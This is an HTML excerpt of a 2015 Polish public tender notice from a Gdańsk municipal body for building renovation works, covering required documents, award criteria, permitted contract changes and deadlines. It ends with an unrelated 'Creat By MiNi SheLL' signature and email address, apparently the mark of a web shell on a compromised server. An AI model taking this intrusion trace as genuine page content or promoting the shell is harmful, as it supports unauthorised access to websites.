<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Przez najważniejsze roboty Zamawiający rozumie roboty budowlane polegające na wykonaniu robót remontowych budynków o wartości nie mniejszej niż 300 000,00 zł brutto, obejmujące roboty ogólnobudowlane, sanitarne i elektryczne.<br>
	Zamawiający nie żąda informacji o robotach budowlanych niewykonanych lub wykonanych nienależycie;;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. <br>

Wyżej wymienione zobowiązanie musi być złożone w formie oryginału.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Złożyć Druk OFERTA, który należy sporządzić wg wzoru druku  zamawiającego.<br>
b)	Podać w złożonej ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcy lub nazwy podwykonawców, na których zasoby wykonawca powołuje się, w celu wykazania spełnienia warunku udziału w postępowaniu. W przypadku nie wskazania podwykonawców, zamawiający uzna, że całość zamówienia będzie wykonywana przez Wykonawcę osobiście.<br>
c)	Podać w ofercie, czy wybór oferty będzie prowadził do powstania u Zamawiającego obowiązku podatkowego, zgodnie z przepisami o podatku od towarów i usług.<br>
d)	Podać w złożonej ofercie okres gwarancji za wady.<br>
	Zamawiający zrównuje okres rękojmi z okresem gwarancji określonym przez Wykonawcę w ofercie.<br>
	Minimalny okres gwarancji winien wynosić 3 lata.<br>
	Określenie termin gwarancji poniżej 3 lat spowoduje odrzucenie oferty.<br>
e)	Załączyć kopię dowodu wpłaty wadium wpłaconego w pieniądzu lub oryginał albo kopię wadium wniesionego w jednej z form określonych w punkcie 15 SIWZ.<br>
f)	Wykazać, że oferta została podpisana przez osobę(y) uprawnioną(e) do występowania w imieniu i na rzecz  Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.90</li>
<li>2 - okres udzielonej gwarancji za wady - 0.10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Następujące postanowienia umowy mogą ulec zmianie:<br>
1.	Przesunięciu może ulec termin wykonania przedmiotu zamówienia, <br>
2.	Zmianie może ulec osoba Kierownika budowy lub Kierowników robót, jako przedstawicieli Wykonawcy pod warunkiem wcześniejszego powiadomienia Zamawiającego o tym fakcie.  <br>
3.	Zmiana lub rezygnacja z podwykonawcy, na którego zasoby wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b ustawy prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu.<br>
4.	Możliwość realizacji umowy przez podwykonawców (zawarcie umów o podwykonawstwo) na etapie jej realizacji, w przypadku braku zadeklarowania realizacji zamówienia przy pomocy podwykonawców na etapie składania ofert. 
Zmiany w umowie mogą zostać wprowadzone przy zaistnieniu następujących okoliczności:<br>
Termin wykonania zamówienia może ulec zmianie w przypadku:<br>
a)	zaistnienia warunków atmosferycznych, które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie w szczególności:<br>
- klęski żywiołowe,<br>
- wystąpienia niekorzystnych warunków atmosferycznych, tj. ciągłych opadów atmosferycznych (deszczu), silnych wiatrów, spadku temperatury poniżej + 5oC, uniemożliwiających wykonywanie robót drogowych i wymiany stolarki okiennej. <br>
b)	wstrzymania robót przez Zamawiającego lub przerwy w wykonywaniu robót powstałych na skutek okoliczności, za które ponosi odpowiedzialność Zamawiający.<br>
c)	inne zmiany spowodowane warunkami niezależnymi i niezawinionymi przez Wykonawcę.<br>
2.	W przypadku wystąpienia okoliczności wymienionych w pkt 1a,1b i 1c termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia  zamówienia w sposób należyty, nie dłużej niż o okres trwania tych okoliczności.<br>
3.	Zmiana osoby Kierownika budowy lub Kierowników robót może nastąpić z przyczyn losowych, niezależnych od Zamawiającego i Wykonawcy np. śmierci, choroby lub w przypadku rozwiązania przez Wykonawcę umowy z Kierownikiem budowy lub Kierownikami robót, itp. Zamawiający zaakceptuje zmianę Kierownika budowy lub Kierowników robót, gdy kwalifikacje i doświadczenie wskazanych osób będą spełniać warunki postawione w tym zakresie w specyfikacji istotnych warunków zamówienia.<br>
4.  Zmiana lub rezygnacja z podwykonawcy, na którego zasoby wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b ustawy prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu  jest możliwa w przypadku wykazania przez wykonawcę, iż proponowany inny podwykonawca (lub wykonawca samodzielnie) spełnia dany warunek udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.<br>
5.	Realizacja umowy przez podwykonawców (zawarcie umów o podwykonawstwo) na etapie jej wykonywania w przypadku braku zadeklarowania przeprowadzenia zamówienia przy pomocy podwykonawców na etapie składania ofert jest możliwa, pod warunkiem uzyskania zgody Zamawiającego i jeżeli w stosunku do części zamówienia, na którą ma być zawarta umowa o podwykonawstwo nie została wyłączona dopuszczalność podwykonawstwa.<br></p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gznk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 80-171 Gdańsk, ul. Cygańska Góra 1, pok. nr 11 w godz. 9:00 - 12:00.<br> Cena brutto - 36,90 PLN.<br>
Warunki i sposób płatności: przelew, zaliczenie pocztowe.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.11.2015 godzina 10:00, miejsce: siedziba Zamawiającego, 80-171 Gdańsk, ul. Cygańska Góra 1, pokój nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 24.12.2015.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> DATA, GODZINA I MIEJSCE OTWARCIA OFERT  25.11.2015 r. godzina 10:15<br>miejsce w siedzibie zamawiającego 80-171 Gdańsk, ul. Cygańska Góra 1, pokój nr 6, świetlica<br>

OSOBY UPRAWNIONE DO POROZUMIEWANIA SIĘ Z WYKONAWCAMI <br>
Grażyna Pietrowska stanowisko służbowe specjalista ds. zamówień publicznych,<br> 
80- 171 Gdańsk ul. Cygańska Góra 1, nr pok. 11, tel.  58 320 10 32<br>
Adres poczty elektronicznej: pietrowska@gznk.pl<br>

ZASADY WYKLUCZENIA WYKONAWCY<br>
Z postępowania o udzielenie zamówienia Zamawiający wykluczy również wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych.<br>
Zamawiający nie wykluczy z postępowania o udzielenie zamówienia publicznego wykonawcy, który udowodnił, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mając zapobiec zawinionemu i poważnemu naruszeniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com